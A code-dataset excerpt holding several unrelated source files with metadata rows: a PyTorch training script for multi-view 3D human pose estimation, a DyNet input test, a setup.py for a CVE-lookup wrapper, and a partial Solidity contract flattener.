# dump to tensorboard per-iter stats about sizes
writer.add_scalar(f"{name}/batch_size", batch_size, n_iters_total)
writer.add_scalar(f"{name}/n_views", n_views, n_iters_total)
n_iters_total += 1
# calculate evaluation metrics
if master:
if not is_train:
results['keypoints_3d'] = np.concatenate(results['keypoints_3d'], axis=0)
results['indexes'] = np.concatenate(results['indexes'])
try:
scalar_metric, full_metric = dataloader.dataset.evaluate(results['keypoints_3d'])
except Exception as e:
print("Failed to evaluate. Reason: ", e)
scalar_metric, full_metric = 0.0, {}
metric_dict['dataset_metric'].append(scalar_metric)
checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
os.makedirs(checkpoint_dir, exist_ok=True)
# dump results
with open(os.path.join(checkpoint_dir, "results.pkl"), 'wb') as fout:
pickle.dump(results, fout)
# dump full metric
with open(os.path.join(checkpoint_dir, "metric.json".format(epoch)), 'w') as fout:
json.dump(full_metric, fout, indent=4, sort_keys=True)
# dump to tensorboard per-epoch stats
for title, value in metric_dict.items():
writer.add_scalar(f"{name}/{title}_epoch", np.mean(value), epoch)
return n_iters_total
def init_distributed(args):
if "WORLD_SIZE" not in os.environ or int(os.environ["WORLD_SIZE"]) < 1:
return False
torch.cuda.set_device(args.local_rank)
assert os.environ["MASTER_PORT"], "set the MASTER_PORT variable or use pytorch launcher"
assert os.environ["RANK"], "use pytorch launcher and explicityly state the rank of the process"
torch.manual_seed(args.seed)
torch.distributed.init_process_group(backend="nccl", init_method="env://")
return True
def main(args):
print("Number of available GPUs: {}".format(torch.cuda.device_count()))
is_distributed = init_distributed(args)
master = True
if is_distributed and os.environ["RANK"]:
master = int(os.environ["RANK"]) == 0
if is_distributed:
device = torch.device(args.local_rank)
else:
device = torch.device(0)
# config
config = cfg.load_config(args.config)
config.opt.n_iters_per_epoch = config.opt.n_objects_per_epoch // config.opt.batch_size
model = {
"ransac": RANSACTriangulationNet,
"alg": AlgebraicTriangulationNet,
"vol": VolumetricTriangulationNet
}[config.model.name](config, device=device).to(device)
if config.model.init_weights:
state_dict = torch.load(config.model.checkpoint)
for key in list(state_dict.keys()):
new_key = key.replace("module.", "")
state_dict[new_key] = state_dict.pop(key)
model.load_state_dict(state_dict, strict=True)
print("Successfully loaded pretrained weights for whole model")
# criterion
criterion_class = {
"MSE": KeypointsMSELoss,
"MSESmooth": KeypointsMSESmoothLoss,
"MAE": KeypointsMAELoss
}[config.opt.criterion]
if config.opt.criterion == "MSESmooth":
criterion = criterion_class(config.opt.mse_smooth_threshold)
else:
criterion = criterion_class()
# optimizer
opt = None
if not args.eval:
if config.model.name == "vol":
opt = torch.optim.Adam(
[{'params': model.backbone.parameters()},
{'params': model.process_features.parameters(), 'lr': config.opt.process_features_lr if hasattr(config.opt, "process_features_lr") else config.opt.lr},
{'params': model.volume_net.parameters(), 'lr': config.opt.volume_net_lr if hasattr(config.opt, "volume_net_lr") else config.opt.lr}
],
lr=config.opt.lr
)
else:
opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=config.opt.lr)
# datasets
print("Loading data...")
train_dataloader, val_dataloader, train_sampler = setup_dataloaders(config, distributed_train=is_distributed)
# experiment
experiment_dir, writer = None, None
if master:
experiment_dir, writer = setup_experiment(config, type(model).__name__, is_train=not args.eval)
# multi-gpu
if is_distributed:
model = DistributedDataParallel(model, device_ids=[device])
if not args.eval:
# train loop
n_iters_total_train, n_iters_total_val = 0, 0
for epoch in range(config.opt.n_epochs):
if train_sampler is not None:
train_sampler.set_epoch(epoch)
n_iters_total_train = one_epoch(model, criterion, opt, config, train_dataloader, device, epoch, n_iters_total=n_iters_total_train, is_train=True, master=master, experiment_dir=experiment_dir, writer=writer)
n_iters_total_val = one_epoch(model, criterion, opt, config, val_dataloader, device, epoch, n_iters_total=n_iters_total_val, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
if master:
checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
os.makedirs(checkpoint_dir, exist_ok=True)
torch.save(model.state_dict(), os.path.join(checkpoint_dir, "weights.pth"))
print(f"{n_iters_total_train} iters done.")
else:
if args.eval_dataset == 'train':
one_epoch(model, criterion, opt, config, train_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
else:
one_epoch(model, criterion, opt, config, val_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
print("Done.")
if __name__ == '__main__':
args = parse_args()
print("args: {}".format(args))
main(args)
| 45.010331 | 218 | 0.626853 | import os
import shutil
import argparse
import time
import json
from datetime import datetime
from collections import defaultdict
from itertools import islice
import pickle
import copy
import numpy as np
import cv2
import torch
from torch import nn
from torch import autograd
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
from tensorboardX import SummaryWriter
from mvn.models.triangulation import RANSACTriangulationNet, AlgebraicTriangulationNet, VolumetricTriangulationNet
from mvn.models.loss import KeypointsMSELoss, KeypointsMSESmoothLoss, KeypointsMAELoss, KeypointsL2Loss, VolumetricCELoss
from mvn.utils import img, multiview, op, vis, misc, cfg
from mvn.datasets import human36m
from mvn.datasets import utils as dataset_utils
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, required=True, help="Path, where config file is stored")
parser.add_argument('--eval', action='store_true', help="If set, then only evaluation will be done")
parser.add_argument('--eval_dataset', type=str, default='val', help="Dataset split on which evaluate. Can be 'train' and 'val'")
parser.add_argument("--local_rank", type=int, help="Local rank of the process on the node")
parser.add_argument("--seed", type=int, default=42, help="Random seed for reproducibility")
parser.add_argument("--logdir", type=str, default="/Vol1/dbstore/datasets/k.iskakov/logs/multi-view-net-repr", help="Path, where logs will be stored")
args = parser.parse_args()
return args
def setup_human36m_dataloaders(config, is_train, distributed_train):
train_dataloader = None
if is_train:
train_dataset = human36m.Human36MMultiViewDataset(
h36m_root=config.dataset.train.h36m_root,
pred_results_path=config.dataset.train.pred_results_path if hasattr(config.dataset.train, "pred_results_path") else None,
train=True,
test=False,
image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
labels_path=config.dataset.train.labels_path,
with_damaged_actions=config.dataset.train.with_damaged_actions,
scale_bbox=config.dataset.train.scale_bbox,
kind=config.kind,
undistort_images=config.dataset.train.undistort_images,
ignore_cameras=config.dataset.train.ignore_cameras if hasattr(config.dataset.train, "ignore_cameras") else [],
crop=config.dataset.train.crop if hasattr(config.dataset.train, "crop") else True,
)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed_train else None
train_dataloader = DataLoader(
train_dataset,
batch_size=config.opt.batch_size,
shuffle=config.dataset.train.shuffle and (train_sampler is None),
sampler=train_sampler,
collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.train.randomize_n_views,
min_n_views=config.dataset.train.min_n_views,
max_n_views=config.dataset.train.max_n_views),
num_workers=config.dataset.train.num_workers,
worker_init_fn=dataset_utils.worker_init_fn,
pin_memory=True
)
val_dataset = human36m.Human36MMultiViewDataset(
h36m_root=config.dataset.val.h36m_root,
pred_results_path=config.dataset.val.pred_results_path if hasattr(config.dataset.val, "pred_results_path") else None,
train=False,
test=True,
image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
labels_path=config.dataset.val.labels_path,
with_damaged_actions=config.dataset.val.with_damaged_actions,
retain_every_n_frames_in_test=config.dataset.val.retain_every_n_frames_in_test,
scale_bbox=config.dataset.val.scale_bbox,
kind=config.kind,
undistort_images=config.dataset.val.undistort_images,
ignore_cameras=config.dataset.val.ignore_cameras if hasattr(config.dataset.val, "ignore_cameras") else [],
crop=config.dataset.val.crop if hasattr(config.dataset.val, "crop") else True,
)
val_dataloader = DataLoader(
val_dataset,
batch_size=config.opt.val_batch_size if hasattr(config.opt, "val_batch_size") else config.opt.batch_size,
shuffle=config.dataset.val.shuffle,
collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.val.randomize_n_views,
min_n_views=config.dataset.val.min_n_views,
max_n_views=config.dataset.val.max_n_views),
num_workers=config.dataset.val.num_workers,
worker_init_fn=dataset_utils.worker_init_fn,
pin_memory=True
)
return train_dataloader, val_dataloader, train_sampler
def setup_dataloaders(config, is_train=True, distributed_train=False):
if config.dataset.kind == 'human36m':
train_dataloader, val_dataloader, train_sampler = setup_human36m_dataloaders(config, is_train, distributed_train)
else:
raise NotImplementedError("Unknown dataset: {}".format(config.dataset.kind))
return train_dataloader, val_dataloader, train_sampler
def setup_experiment(config, model_name, is_train=True):
prefix = "" if is_train else "eval_"
if config.title:
experiment_title = config.title + "_" + model_name
else:
experiment_title = model_name
experiment_title = prefix + experiment_title
experiment_name = '{}@{}'.format(experiment_title, datetime.now().strftime("%d.%m.%Y-%H:%M:%S"))
print("Experiment name: {}".format(experiment_name))
experiment_dir = os.path.join(args.logdir, experiment_name)
os.makedirs(experiment_dir, exist_ok=True)
checkpoints_dir = os.path.join(experiment_dir, "checkpoints")
os.makedirs(checkpoints_dir, exist_ok=True)
shutil.copy(args.config, os.path.join(experiment_dir, "config.yaml"))
writer = SummaryWriter(os.path.join(experiment_dir, "tb"))
writer.add_text(misc.config_to_str(config), "config", 0)
return experiment_dir, writer
def one_epoch(model, criterion, opt, config, dataloader, device, epoch, n_iters_total=0, is_train=True, caption='', master=False, experiment_dir=None, writer=None):
name = "train" if is_train else "val"
model_type = config.model.name
if is_train:
model.train()
else:
model.eval()
metric_dict = defaultdict(list)
results = defaultdict(list)
grad_context = torch.autograd.enable_grad if is_train else torch.no_grad
with grad_context():
end = time.time()
iterator = enumerate(dataloader)
if is_train and config.opt.n_iters_per_epoch is not None:
iterator = islice(iterator, config.opt.n_iters_per_epoch)
for iter_i, batch in iterator:
with autograd.detect_anomaly():
data_time = time.time() - end
if batch is None:
print("Found None batch")
continue
images_batch, keypoints_3d_gt, keypoints_3d_validity_gt, proj_matricies_batch = dataset_utils.prepare_batch(batch, device, config)
keypoints_2d_pred, cuboids_pred, base_points_pred = None, None, None
if model_type == "alg" or model_type == "ransac":
keypoints_3d_pred, keypoints_2d_pred, heatmaps_pred, confidences_pred = model(images_batch, proj_matricies_batch, batch)
elif model_type == "vol":
keypoints_3d_pred, heatmaps_pred, volumes_pred, confidences_pred, cuboids_pred, coord_volumes_pred, base_points_pred = model(images_batch, proj_matricies_batch, batch)
batch_size, n_views, image_shape = images_batch.shape[0], images_batch.shape[1], tuple(images_batch.shape[3:])
n_joints = keypoints_3d_pred[0].shape[1]
keypoints_3d_binary_validity_gt = (keypoints_3d_validity_gt > 0.0).type(torch.float32)
scale_keypoints_3d = config.opt.scale_keypoints_3d if hasattr(config.opt, "scale_keypoints_3d") else 1.0
if n_views == 1:
if config.kind == "human36m":
base_joint = 6
elif config.kind == "coco":
base_joint = 11
keypoints_3d_gt_transformed = keypoints_3d_gt.clone()
keypoints_3d_gt_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_gt_transformed[:, base_joint:base_joint + 1]
keypoints_3d_gt = keypoints_3d_gt_transformed
keypoints_3d_pred_transformed = keypoints_3d_pred.clone()
keypoints_3d_pred_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_pred_transformed[:, base_joint:base_joint + 1]
keypoints_3d_pred = keypoints_3d_pred_transformed
total_loss = 0.0
loss = criterion(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
total_loss += loss
metric_dict[f'{config.opt.criterion}'].append(loss.item())
use_volumetric_ce_loss = config.opt.use_volumetric_ce_loss if hasattr(config.opt, "use_volumetric_ce_loss") else False
if use_volumetric_ce_loss:
volumetric_ce_criterion = VolumetricCELoss()
loss = volumetric_ce_criterion(coord_volumes_pred, volumes_pred, keypoints_3d_gt, keypoints_3d_binary_validity_gt)
metric_dict['volumetric_ce_loss'].append(loss.item())
weight = config.opt.volumetric_ce_loss_weight if hasattr(config.opt, "volumetric_ce_loss_weight") else 1.0
total_loss += weight * loss
metric_dict['total_loss'].append(total_loss.item())
if is_train:
opt.zero_grad()
total_loss.backward()
if hasattr(config.opt, "grad_clip"):
torch.nn.utils.clip_grad_norm_(model.parameters(), config.opt.grad_clip / config.opt.lr)
metric_dict['grad_norm_times_lr'].append(config.opt.lr * misc.calc_gradient_norm(filter(lambda x: x[1].requires_grad, model.named_parameters())))
opt.step()
l2 = KeypointsL2Loss()(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
metric_dict['l2'].append(l2.item())
if base_points_pred is not None:
base_point_l2_list = []
for batch_i in range(batch_size):
base_point_pred = base_points_pred[batch_i]
if config.model.kind == "coco":
base_point_gt = (keypoints_3d_gt[batch_i, 11, :3] + keypoints_3d[batch_i, 12, :3]) / 2
elif config.model.kind == "mpii":
base_point_gt = keypoints_3d_gt[batch_i, 6, :3]
base_point_l2_list.append(torch.sqrt(torch.sum((base_point_pred * scale_keypoints_3d - base_point_gt * scale_keypoints_3d) ** 2)).item())
base_point_l2 = 0.0 if len(base_point_l2_list) == 0 else np.mean(base_point_l2_list)
metric_dict['base_point_l2'].append(base_point_l2)
if not is_train:
results['keypoints_3d'].append(keypoints_3d_pred.detach().cpu().numpy())
results['indexes'].append(batch['indexes'])
if master:
if n_iters_total % config.vis_freq == 0:
vis_kind = config.kind
if (config.transfer_cmu_to_human36m if hasattr(config, "transfer_cmu_to_human36m") else False):
vis_kind = "coco"
for batch_i in range(min(batch_size, config.vis_n_elements)):
keypoints_vis = vis.visualize_batch(
images_batch, heatmaps_pred, keypoints_2d_pred, proj_matricies_batch,
keypoints_3d_gt, keypoints_3d_pred,
kind=vis_kind,
cuboids_batch=cuboids_pred,
confidences_batch=confidences_pred,
batch_index=batch_i, size=5,
max_n_cols=10
)
writer.add_image(f"{name}/keypoints_vis/{batch_i}", keypoints_vis.transpose(2, 0, 1), global_step=n_iters_total)
heatmaps_vis = vis.visualize_heatmaps(
images_batch, heatmaps_pred,
kind=vis_kind,
batch_index=batch_i, size=5,
max_n_rows=10, max_n_cols=10
)
writer.add_image(f"{name}/heatmaps/{batch_i}", heatmaps_vis.transpose(2, 0, 1), global_step=n_iters_total)
if model_type == "vol":
volumes_vis = vis.visualize_volumes(
images_batch, volumes_pred, proj_matricies_batch,
kind=vis_kind,
cuboids_batch=cuboids_pred,
batch_index=batch_i, size=5,
max_n_rows=1, max_n_cols=16
)
writer.add_image(f"{name}/volumes/{batch_i}", volumes_vis.transpose(2, 0, 1), global_step=n_iters_total)
if n_iters_total % config.vis_freq == 0:
for p_name, p in model.named_parameters():
try:
writer.add_histogram(p_name, p.clone().cpu().data.numpy(), n_iters_total)
except ValueError as e:
print(e)
print(p_name, p)
exit()
if is_train:
for title, value in metric_dict.items():
writer.add_scalar(f"{name}/{title}", value[-1], n_iters_total)
batch_time = time.time() - end
end = time.time()
writer.add_scalar(f"{name}/batch_time", batch_time, n_iters_total)
writer.add_scalar(f"{name}/data_time", data_time, n_iters_total)
writer.add_scalar(f"{name}/batch_size", batch_size, n_iters_total)
writer.add_scalar(f"{name}/n_views", n_views, n_iters_total)
n_iters_total += 1
if master:
if not is_train:
results['keypoints_3d'] = np.concatenate(results['keypoints_3d'], axis=0)
results['indexes'] = np.concatenate(results['indexes'])
try:
scalar_metric, full_metric = dataloader.dataset.evaluate(results['keypoints_3d'])
except Exception as e:
print("Failed to evaluate. Reason: ", e)
scalar_metric, full_metric = 0.0, {}
metric_dict['dataset_metric'].append(scalar_metric)
checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
os.makedirs(checkpoint_dir, exist_ok=True)
with open(os.path.join(checkpoint_dir, "results.pkl"), 'wb') as fout:
pickle.dump(results, fout)
with open(os.path.join(checkpoint_dir, "metric.json".format(epoch)), 'w') as fout:
json.dump(full_metric, fout, indent=4, sort_keys=True)
for title, value in metric_dict.items():
writer.add_scalar(f"{name}/{title}_epoch", np.mean(value), epoch)
return n_iters_total
def init_distributed(args):
if "WORLD_SIZE" not in os.environ or int(os.environ["WORLD_SIZE"]) < 1:
return False
torch.cuda.set_device(args.local_rank)
assert os.environ["MASTER_PORT"], "set the MASTER_PORT variable or use pytorch launcher"
assert os.environ["RANK"], "use pytorch launcher and explicityly state the rank of the process"
torch.manual_seed(args.seed)
torch.distributed.init_process_group(backend="nccl", init_method="env://")
return True
def main(args):
print("Number of available GPUs: {}".format(torch.cuda.device_count()))
is_distributed = init_distributed(args)
master = True
if is_distributed and os.environ["RANK"]:
master = int(os.environ["RANK"]) == 0
if is_distributed:
device = torch.device(args.local_rank)
else:
device = torch.device(0)
config = cfg.load_config(args.config)
config.opt.n_iters_per_epoch = config.opt.n_objects_per_epoch // config.opt.batch_size
model = {
"ransac": RANSACTriangulationNet,
"alg": AlgebraicTriangulationNet,
"vol": VolumetricTriangulationNet
}[config.model.name](config, device=device).to(device)
if config.model.init_weights:
state_dict = torch.load(config.model.checkpoint)
for key in list(state_dict.keys()):
new_key = key.replace("module.", "")
state_dict[new_key] = state_dict.pop(key)
model.load_state_dict(state_dict, strict=True)
print("Successfully loaded pretrained weights for whole model")
criterion_class = {
"MSE": KeypointsMSELoss,
"MSESmooth": KeypointsMSESmoothLoss,
"MAE": KeypointsMAELoss
}[config.opt.criterion]
if config.opt.criterion == "MSESmooth":
criterion = criterion_class(config.opt.mse_smooth_threshold)
else:
criterion = criterion_class()
opt = None
if not args.eval:
if config.model.name == "vol":
opt = torch.optim.Adam(
[{'params': model.backbone.parameters()},
{'params': model.process_features.parameters(), 'lr': config.opt.process_features_lr if hasattr(config.opt, "process_features_lr") else config.opt.lr},
{'params': model.volume_net.parameters(), 'lr': config.opt.volume_net_lr if hasattr(config.opt, "volume_net_lr") else config.opt.lr}
],
lr=config.opt.lr
)
else:
opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=config.opt.lr)
print("Loading data...")
train_dataloader, val_dataloader, train_sampler = setup_dataloaders(config, distributed_train=is_distributed)
experiment_dir, writer = None, None
if master:
experiment_dir, writer = setup_experiment(config, type(model).__name__, is_train=not args.eval)
if is_distributed:
model = DistributedDataParallel(model, device_ids=[device])
if not args.eval:
n_iters_total_train, n_iters_total_val = 0, 0
for epoch in range(config.opt.n_epochs):
if train_sampler is not None:
train_sampler.set_epoch(epoch)
n_iters_total_train = one_epoch(model, criterion, opt, config, train_dataloader, device, epoch, n_iters_total=n_iters_total_train, is_train=True, master=master, experiment_dir=experiment_dir, writer=writer)
n_iters_total_val = one_epoch(model, criterion, opt, config, val_dataloader, device, epoch, n_iters_total=n_iters_total_val, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
if master:
checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
os.makedirs(checkpoint_dir, exist_ok=True)
torch.save(model.state_dict(), os.path.join(checkpoint_dir, "weights.pth"))
print(f"{n_iters_total_train} iters done.")
else:
if args.eval_dataset == 'train':
one_epoch(model, criterion, opt, config, train_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
else:
one_epoch(model, criterion, opt, config, val_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
print("Done.")
if __name__ == '__main__':
args = parse_args()
print("args: {}".format(args))
main(args)
| true | true |
1c3c863f8dbfa12aebedfc5f04b59e1dd98d9fe3 | 1,849 | py | Python | python_tests/test_input.py | cherryc/dynet | 54bf3fa04f55f0730a9a21b5708e94dc153394da | [
"Apache-2.0"
] | 1 | 2021-03-10T17:40:09.000Z | 2021-03-10T17:40:09.000Z | python_tests/test_input.py | cherryc/dynet | 54bf3fa04f55f0730a9a21b5708e94dc153394da | [
"Apache-2.0"
] | null | null | null | python_tests/test_input.py | cherryc/dynet | 54bf3fa04f55f0730a9a21b5708e94dc153394da | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import dynet as dy
import numpy as np
input_vals = np.arange(81)
squared_norm = (input_vals**2).sum()
shapes = [(81,), (3, 27), (3, 3, 9), (3, 3, 3, 3)]
for i in range(4):
# Not batched
dy.renew_cg()
input_tensor = input_vals.reshape(shapes[i])
x = dy.inputTensor(input_tensor)
assert (x.dim()[0] == shapes[i] and x.dim()[1] == 1),"Dimension mismatch : {} : ({}, {})".format(x.dim(), shapes[i],1)
assert (x.npvalue() == input_tensor).all(), "Expression value different from initial value"
assert dy.squared_norm(x).scalar_value() == squared_norm, "Value mismatch"
# Batched
dy.renew_cg()
xb = dy.inputTensor(input_tensor, batched=True)
assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]), "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
# Batched with list
dy.renew_cg()
xb = dy.inputTensor([np.asarray(x).transpose() for x in input_tensor.transpose()])
assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]) , "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
caught = False
try:
dy.renew_cg()
x = dy.inputTensor("This is not a tensor", batched=True)
except TypeError:
caught = True
assert caught, "Exception wasn't caught"
| 49.972973 | 212 | 0.646836 | from __future__ import print_function
import dynet as dy
import numpy as np
input_vals = np.arange(81)
squared_norm = (input_vals**2).sum()
shapes = [(81,), (3, 27), (3, 3, 9), (3, 3, 3, 3)]
for i in range(4):
dy.renew_cg()
input_tensor = input_vals.reshape(shapes[i])
x = dy.inputTensor(input_tensor)
assert (x.dim()[0] == shapes[i] and x.dim()[1] == 1),"Dimension mismatch : {} : ({}, {})".format(x.dim(), shapes[i],1)
assert (x.npvalue() == input_tensor).all(), "Expression value different from initial value"
assert dy.squared_norm(x).scalar_value() == squared_norm, "Value mismatch"
dy.renew_cg()
xb = dy.inputTensor(input_tensor, batched=True)
assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]), "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
dy.renew_cg()
xb = dy.inputTensor([np.asarray(x).transpose() for x in input_tensor.transpose()])
assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]) , "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
caught = False
try:
dy.renew_cg()
x = dy.inputTensor("This is not a tensor", batched=True)
except TypeError:
caught = True
assert caught, "Exception wasn't caught"
| true | true |
1c3c86d0383a877e5a99c2cda9404c7dd72f8140 | 936 | py | Python | setup.py | penafieljlm/PyCVESearch2.7 | 75a9f3f64bd497538363b0079ca8b88d4971bc92 | [
"Apache-2.0"
] | null | null | null | setup.py | penafieljlm/PyCVESearch2.7 | 75a9f3f64bd497538363b0079ca8b88d4971bc92 | [
"Apache-2.0"
] | null | null | null | setup.py | penafieljlm/PyCVESearch2.7 | 75a9f3f64bd497538363b0079ca8b88d4971bc92 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name='pycvesearch',
version='0.5',
url='https://github.com/cve-search/PyCVESearch',
author='Raphaël Vinot',
author_email='raphael.vinot@circl.lu',
license='Apache v2.0 License',
packages=['pycvesearch'],
description='A python wrapper around cve.circl.lu',
long_description=open('README.md', 'r').read(),
keywords=['CVE', 'API', 'wrapper'],
classifiers=[
'License :: OSI Approved :: BSD License',
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Telecommunications Industry',
'Programming Language :: Python',
'Topic :: Security',
'Topic :: Internet',
],
tests_requires=['nose'],
test_suite='nose.collector',
install_requires=['requests'],
)
| 30.193548 | 59 | 0.621795 |
from setuptools import setup
setup(
name='pycvesearch',
version='0.5',
url='https://github.com/cve-search/PyCVESearch',
author='Raphaël Vinot',
author_email='raphael.vinot@circl.lu',
license='Apache v2.0 License',
packages=['pycvesearch'],
description='A python wrapper around cve.circl.lu',
long_description=open('README.md', 'r').read(),
keywords=['CVE', 'API', 'wrapper'],
classifiers=[
'License :: OSI Approved :: BSD License',
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Telecommunications Industry',
'Programming Language :: Python',
'Topic :: Security',
'Topic :: Internet',
],
tests_requires=['nose'],
test_suite='nose.collector',
install_requires=['requests'],
)
| true | true |
1c3c86f7601284851cba9d90b8b26aebf236f7f5 | 4,036 | py | Python | flaterra/__init__.py | cleanunicorn/flaterra | 757fdf072cb80dde945eda19b789009b6fedf6e7 | [
"MIT"
] | 15 | 2019-02-11T20:13:49.000Z | 2022-01-10T08:01:53.000Z | flaterra/__init__.py | cleanunicorn/flaterra | 757fdf072cb80dde945eda19b789009b6fedf6e7 | [
"MIT"
] | 2 | 2019-04-08T13:43:53.000Z | 2020-11-11T14:14:48.000Z | flaterra/__init__.py | cleanunicorn/flaterra | 757fdf072cb80dde945eda19b789009b6fedf6e7 | [
"MIT"
] | 2 | 2019-04-08T13:20:05.000Z | 2020-07-22T16:55:54.000Z | import re
import argparse
import logging
import sys
import os
# Save what files were already imported
imported_files = {}
pragma_dict = {}
def flat_file(path, file, level=0):
# Normalize path
file = os.path.realpath("{path}/{file}".format(path=path, file=file))
path = os.path.dirname(file)
# Flattened source
flat_source = ""
# Check if this file was already included
global imported_files
if (file is not None) and (imported_files.get(file) is None):
imported_files[file] = True
logging.debug("Importing file {file}".format(file=file))
else:
logging.debug("Skipping file {file}".format(file=file))
return flat_source
logging.info(("+" * level) + " {file}".format(file=file))
logging.debug("Reading file {file}".format(file=file))
with open(file) as f:
read_data = f.readlines()
# Match for pragma at level >0
# ex: pragma solidity 0.5.0;
# ex: pragma experimental ABIEncoderV2;
global pragma_dict
for l in read_data:
# Add experimental pragma flags
pragma_experimental = re.findall(
r"(\/\/)|\s*(pragma?)\s*(experimental?)\s*(.*?)\s*;", l
)
if (
len(pragma_experimental) == 1
and (pragma_experimental[0][1] == "pragma")
and (pragma_experimental[0][2] == "experimental")
):
pragma_experimental = pragma_experimental[0]
pragma_experimental = "|".join(pragma_experimental)
if (pragma_experimental is not None) and (
pragma_dict.get(pragma_experimental) is None
):
pragma_dict[pragma_experimental] = True
logging.info("Adding pragma: {pragma}".format(pragma=l))
else:
# This pragma was already added
continue
# Skip other pragma definitions for included files
if main is False:
pragma_match = re.search(pragma_regex, l)
if pragma_match is not None:
continue
# Import files that are referenced
# ex: import "./contract.sol";
# ex: import {Contract, Contract2} from "./contracts.sol";
import_match = re.findall(
r"^\s*import\s+|(?!{.*}\s*from\s*)[\"|\'](.*)[\"|\']\s*;\s*$", l
)
if len(import_match) == 2:
imported_file = import_match[1]
flat_source += flat_file(path=path, file=imported_file, level=level + 1)
flat_source += "\n"
# Skip the import clause
continue
# Add line
flat_source += l
return flat_source
def main():
class CliParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write("Error: {}\n".format(message))
self.print_help()
sys.exit(2)
parser = CliParser()
parser.add_argument("--folder", help="Folder with contracts", default="./")
parser.add_argument("--contract", help="Main source Solidity file")
parser.add_argument(
"--output",
help="Output flattened Solidity file. Otherwise it appends `_flat.sol` to the contract filename.",
)
parser.add_argument(
"--verbose", "-v", action="count", default=0, help="Show details"
)
args = parser.parse_args()
contracts_dir = args.folder
main_sol = args.contract
output_sol = args.output
verbose = args.verbose
# Set verbosity
logging.getLogger().setLevel(logging.INFO)
if verbose >= 1:
logging.getLogger().setLevel(logging.DEBUG)
source = flat_file(path=contracts_dir, file=main_sol, level=0)
if not output_sol:
output_sol = main_sol.split(".")
output_sol.pop()
output_sol[-1] += "_flat"
output_sol.append("sol")
output_sol = ".".join(output_sol)
logging.info("Writing flattened file {file}".format(file=output_sol))
with open(output_sol, "w") as f:
f.write(source)
if __name__ == "__main__":
main()
| 30.575758 | 106 | 0.595639 | import re
import argparse
import logging
import sys
import os
imported_files = {}
pragma_dict = {}
def flat_file(path, file, level=0):
file = os.path.realpath("{path}/{file}".format(path=path, file=file))
path = os.path.dirname(file)
flat_source = ""
global imported_files
if (file is not None) and (imported_files.get(file) is None):
imported_files[file] = True
logging.debug("Importing file {file}".format(file=file))
else:
logging.debug("Skipping file {file}".format(file=file))
return flat_source
logging.info(("+" * level) + " {file}".format(file=file))
logging.debug("Reading file {file}".format(file=file))
with open(file) as f:
read_data = f.readlines()
global pragma_dict
for l in read_data:
pragma_experimental = re.findall(
r"(\/\/)|\s*(pragma?)\s*(experimental?)\s*(.*?)\s*;", l
)
if (
len(pragma_experimental) == 1
and (pragma_experimental[0][1] == "pragma")
and (pragma_experimental[0][2] == "experimental")
):
pragma_experimental = pragma_experimental[0]
pragma_experimental = "|".join(pragma_experimental)
if (pragma_experimental is not None) and (
pragma_dict.get(pragma_experimental) is None
):
